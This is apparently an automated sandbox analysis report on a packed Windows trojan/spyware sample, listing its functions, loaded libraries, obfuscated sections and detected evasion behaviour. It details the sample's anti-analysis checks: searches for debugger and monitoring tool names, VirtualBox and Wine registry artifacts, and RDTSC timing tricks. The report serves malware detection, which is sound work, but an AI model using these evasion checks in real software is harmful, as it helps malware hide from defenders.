    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_01182F900_2_01182F90
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_0114AE300_2_0114AE30
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00EFEF900_2_00EFEF90
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00EF8F900_2_00EF8F90
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E54F700_2_00E54F70
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E410E60_2_00E410E6
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_011A35B00_2_011A35B0
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_0119D4300_2_0119D430
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_011C17A00_2_011C17A0
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_011856D00_2_011856D0
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_011899200_2_01189920
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00EE98800_2_00EE9880
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_011A1BD00_2_011A1BD0
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E71BE00_2_00E71BE0
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_011B3A700_2_011B3A70
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E45DB00_2_00E45DB0
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_010E9C800_2_010E9C80
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_01197CC00_2_01197CC0
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E43ED00_2_00E43ED0
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E55EB00_2_00E55EB0
    Source: C:\Users\user\Desktop\random(5).exeCode function: String function: 00E3C960 appears 37 times
    Source: C:\Users\user\Desktop\random(5).exeCode function: String function: 00F144A0 appears 76 times
    Source: C:\Users\user\Desktop\random(5).exeCode function: String function: 00E373F0 appears 114 times
    Source: C:\Users\user\Desktop\random(5).exeCode function: String function: 00FE7220 appears 97 times
    Source: C:\Users\user\Desktop\random(5).exeCode function: String function: 00E750A0 appears 101 times
    Source: C:\Users\user\Desktop\random(5).exeCode function: String function: 00E74FD0 appears 291 times
    Source: C:\Users\user\Desktop\random(5).exeCode function: String function: 00E74F40 appears 347 times
    Source: C:\Users\user\Desktop\random(5).exeCode function: String function: 00E3CAA0 appears 64 times
    Source: C:\Users\user\Desktop\random(5).exeCode function: String function: 00E75340 appears 50 times
    Source: C:\Users\user\Desktop\random(5).exeCode function: String function: 00E371E0 appears 47 times
    Source: C:\Users\user\Desktop\random(5).exeCode function: String function: 00E4CD40 appears 75 times
    Source: C:\Users\user\Desktop\random(5).exeCode function: String function: 00E4CCD0 appears 54 times
    Source: C:\Users\user\Desktop\random(5).exeCode function: String function: 0100CBC0 appears 104 times
    Source: C:\Users\user\Desktop\random(5).exeCode function: String function: 00E375A0 appears 706 times
    Source: random(5).exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
    Source: random(5).exeStatic PE information: Section: whflkpvn ZLIB complexity 0.994563728436086
    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E3255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00E3255D
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E329FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00E329FF
    Source: C:\Users\user\Desktop\random(5).exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
    Source: C:\Users\user\Desktop\random(5).exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: random(5).exeVirustotal: Detection: 48%
    Source: random(5).exeReversingLabs: Detection: 44%
    Source: random(5).exeString found in binary or memory: Unable to complete request for channel-process-startup
    Source: random(5).exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
    Source: C:\Users\user\Desktop\random(5).exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeSection loaded: kernel.appcore.dllJump to behavior
    Source: random(5).exeStatic file information: File size 4484096 > 1048576
    Source: random(5).exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x289000
    Source: random(5).exeStatic PE information: Raw size of whflkpvn is bigger than: 0x100000 < 0x1ba000

    Data Obfuscation

    barindex
    Detected unpacking (changes PE section rights)
    Source: C:\Users\user\Desktop\random(5).exeUnpacked PE file: 0.2.random(5).exe.e30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;whflkpvn:EW;esywlygt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;whflkpvn:EW;esywlygt:EW;.taggant:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
    Source: random(5).exeStatic PE information: real checksum: 0x4507bd should be: 0x4519af
    Source: random(5).exeStatic PE information: section name:
    Source: random(5).exeStatic PE information: section name: .idata
    Source: random(5).exeStatic PE information: section name:
    Source: random(5).exeStatic PE information: section name: whflkpvn
    Source: random(5).exeStatic PE information: section name: esywlygt
    Source: random(5).exeStatic PE information: section name: .taggant
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_3_00845F60 pushfd ; ret 0_3_00845F61
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_011B41D0 push eax; mov dword ptr [esp], edx0_2_011B41D5
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00EB2340 push eax; mov dword ptr [esp], 00000000h0_2_00EB2343
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00EEC7F0 push eax; mov dword ptr [esp], 00000000h0_2_00EEC743
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E8E92D push es; retf 0_2_00E8E92E
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E70AC0 push eax; mov dword ptr [esp], 00000000h0_2_00E70AC4
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E91430 push eax; mov dword ptr [esp], 00000000h0_2_00E91433
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00EB39A0 push eax; mov dword ptr [esp], 00000000h0_2_00EB39A3
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E8DAD0 push eax; mov dword ptr [esp], edx0_2_00E8DAD1
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_011B9F40 push dword ptr [eax+04h]; ret 0_2_011B9F6F
    Source: random(5).exeStatic PE information: section name: whflkpvn entropy: 7.955966555987466

    Boot Survival

    barindex
    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
    Source: C:\Users\user\Desktop\random(5).exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeWindow searched: window name: RegmonClassJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeWindow searched: window name: RegmonclassJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeWindow searched: window name: FilemonclassJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

    Malware Analysis System Evasion

    barindex
    Tries to detect sandboxes / dynamic malware analysis system (registry check)
    Source: C:\Users\user\Desktop\random(5).exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
    Source: C:\Users\user\Desktop\random(5).exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
    Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
    Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
    Source: random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
    Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 16FBCF8 second address: 16FBCFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 16FBCFC second address: 16FBD00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17000DF second address: 17000EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17000EA second address: 17000EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17000EF second address: 1700109 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C385h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1700268 second address: 170026C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 170026C second address: 170028F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F519CD4C37Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F519CD4C382h 0x00000011 jl 00007F519CD4C376h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 170028F second address: 1700299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1700299 second address: 17002C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C383h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F519CD4C37Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 jno 00007F519CD4C376h 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1700947 second address: 170094B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 170094B second address: 170096A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C389h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17030F6 second address: 1703131 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F519CFC89B8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f jmp 00007F519CFC89C5h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F519CFC89C5h 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1703131 second address: 170316B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F519CD4C376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F519CD4C388h 0x00000014 pop eax 0x00000015 mov esi, dword ptr [ebp+122D3A6Fh] 0x0000001b lea ebx, dword ptr [ebp+12455EB8h] 0x00000021 xchg eax, ebx 0x00000022 push ecx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 170316B second address: 170316F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 172455B second address: 1724574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F519CD4C384h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 16F015E second address: 16F0177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CFC89C3h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1722566 second address: 172257F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F519CD4C376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F519CD4C37Dh 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 172257F second address: 172258B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnp 00007F519CFC89B6h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1722848 second address: 1722860 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C384h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17229A0 second address: 17229BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F519CFC89C3h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1722B16 second address: 1722B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1722B1C second address: 1722B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jng 00007F519CFC89B6h 0x0000000e jmp 00007F519CFC89C8h 0x00000013 popad 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1722B43 second address: 1722B49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1722FA2 second address: 1722FC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1722FC3 second address: 1722FC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1722FC7 second address: 1722FD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007F519CFC89B6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 172328A second address: 1723294 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F519CD4C376h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17233C8 second address: 17233EB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F519CFC89B6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F519CFC89C3h 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1723569 second address: 172356D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1723DDC second address: 1723DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1723DE7 second address: 1723DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1723DEB second address: 1723DEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1723DEF second address: 1723DF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1723DF5 second address: 1723DFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1723DFB second address: 1723E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1723E01 second address: 1723E2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F519CFC89B8h 0x00000015 js 00007F519CFC89BAh 0x0000001b push eax 0x0000001c pop eax 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1723E2F second address: 1723E48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CD4C383h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1724106 second address: 1724113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 je 00007F519CFC89B6h 0x0000000c popad 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1724113 second address: 1724119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1724119 second address: 172412A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F519CFC89BDh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 172412A second address: 172415D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F519CD4C381h 0x0000000f jns 00007F519CD4C376h 0x00000015 jmp 00007F519CD4C37Ch 0x0000001a popad 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 172415D second address: 1724166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1724166 second address: 172416C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 172416C second address: 1724170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1728DF4 second address: 1728DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1729325 second address: 172933C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F519CFC89BBh 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 172933C second address: 1729358 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C388h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 172AAA6 second address: 172AAAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 172AAAC second address: 172AAB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 172BF9F second address: 172BFA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 172BFA3 second address: 172BFB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 16EE667 second address: 16EE695 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F519CFC89BFh 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 16EE695 second address: 16EE699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 173227F second address: 173229A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007F519CFC89BEh 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1731A9C second address: 1731AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F519CD4C37Dh 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 16F6C2A second address: 16F6C34 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F519CFC89B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1735645 second address: 173564B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
